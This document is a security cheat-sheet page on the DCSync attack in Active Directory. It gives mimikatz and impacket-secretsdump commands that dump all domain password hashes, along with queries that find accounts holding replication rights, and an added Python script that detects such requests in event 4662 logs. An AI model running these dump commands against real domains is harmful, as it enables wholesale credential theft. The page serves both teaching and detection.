#Windows Security #Domain Privesc #Credentials Dump #DCSync

Credentials dump using DCSync attack

Requirements:

  • The current user needs the DCSync permissions (listed below) granted on the Domain object. The Domain Admins, Enterprise Admins, Administrators and Domain Controllers groups have these permissions by default.
  • Access to the LDAP service on a DC.

A DCSync attack abuses a legitimate Active Directory function to steal password data from the Domain Controller database. DCSync simulates the behaviour of a Domain Controller and asks another DC to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR) and its GetNCChanges function. In response the DC returns replication data that includes password hashes. Most often the host from which DCSync is executed is not restricted, so you only need the right user.

Required DCSync permissions on the Domain Object:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes In Filtered Set

Windows:

WARNING: This assumes that you are a user who has DCSync permissions and that you have a valid TGT or TGS for the DC LDAP service in memory. It may be necessary to become someone else (e.g. a domain admin) first using the Delegation Abuse, Pass-the-Ticket or RunAs techniques.

.\mimikatz.exe
 
# Get a single domain user password hash
> lsadump::dcsync /domain:$domain /user:$user
 
# Get all domain users password hashes
> lsadump::dcsync /domain:$domain /all

Linux:

# DCSync using password
impacket-secretsdump -just-dc $domain/$user:$pass@$dc_ip
 
# DCSync using NT hash
impacket-secretsdump -hashes :$nt_hash -just-dc $domain/$user@$host
 
# DCSync using Kerberos TGT
export KRB5CCNAME=$tgt_ccache_file
impacket-secretsdump $hostname -k -no-pass -dc-ip $dc_ip -just-dc

Enumerate users or groups with DCSync permissions

Active Directory module:

(Get-Acl "ad:\dc=$domain_p2,dc=$domain_p1").Access | ? {($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) } | select IdentityReference

PowerView module:

Get-ObjectACL "DC=$domain_p2,DC=$domain_p1" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')} | select SecurityIdentifier,@{n="Identity";e={Convert-SidToName $_.SecurityIdentifier}} 
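The ACL checks above find who could run DCSync; the counterpart on the detection side is to watch for the rights actually being exercised. When "Audit Directory Service Access" is enabled and the domain object carries a SACL for the replication rights, each GetNCChanges request is logged as Security event 4662 whose Properties field lists the control-access GUIDs used. The following script is an added example (not from the original page): it parses constructed 4662 records flattened to key=value lines, keeps those where the control-access bit is set and one of the three replication GUIDs from the page appears, and reports any requester that is not a known Domain Controller account. The DC account list and the record format are assumptions for the example.

```python
"""
Added detection example: flag DCSync-style replication requests recorded as
Windows Security event 4662 when the requester is not a Domain Controller.
Sample records below are constructed; the DC account list is an assumption.
"""
import re

# Control-access right GUIDs that a DCSync requester must hold on the domain
# object (the same three GUIDs used in the ACL enumeration above).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# ADS_RIGHT_DS_CONTROL_ACCESS: the AccessMask bit 4662 reports for control-access rights.
CONTROL_ACCESS = 0x100

# Assumption: machine accounts of the environment's Domain Controllers.
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)

# Constructed 4662 records flattened to "key=value; key=value" lines, as a SIEM
# forwarder might emit them. Only the fields used below are included.
SAMPLE_EVENTS = [
    # Normal replication between DCs: DC02$ pulls changes from another DC.
    "EventID=4662; SubjectDomainName=CORP; SubjectUserName=DC02$; AccessMask=0x100; "
    "Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # A service account exercising both replication rights: DCSync-like.
    "EventID=4662; SubjectDomainName=CORP; SubjectUserName=svc_backup; AccessMask=0x100; "
    "Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # An ordinary directory read: control-access bit not set, no replication GUIDs.
    "EventID=4662; SubjectDomainName=CORP; SubjectUserName=jdoe; AccessMask=0x10; Properties=%%7688",
    # Unrelated event type, ignored.
    "EventID=4624; SubjectDomainName=CORP; SubjectUserName=jdoe",
]


def parse_record(line):
    """Turn a 'key=value; key=value' line into a dict (values may contain spaces)."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def replication_rights(properties):
    """Return the replication right names whose GUIDs appear in a Properties field."""
    present = {g.lower() for g in GUID_RE.findall(properties)}
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in present]


def detect_dcsync(records, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return one finding per 4662 record in which a non-DC account used a
    replication control-access right on the directory."""
    dc_accounts = {d.upper() for d in known_dcs}
    findings = []
    for line in records:
        ev = parse_record(line)
        if ev.get("EventID") != "4662":
            continue
        if (int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS) == 0:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        if user.upper() in dc_accounts:
            continue  # expected replication partner
        findings.append({
            "user": f"{ev.get('SubjectDomainName', '')}\\{user}",
            "rights": rights,
        })
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {f['user']}: {', '.join(f['rights'])}")
```

Run against the constructed sample, only the svc_backup record is reported. In practice the DC allowlist should be built from the Domain Controllers OU rather than hard-coded, and a single account requesting both Get-Changes and Get-Changes-All from a non-DC host is the pattern worth alerting on, since legitimate replication is only ever initiated by DCs.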
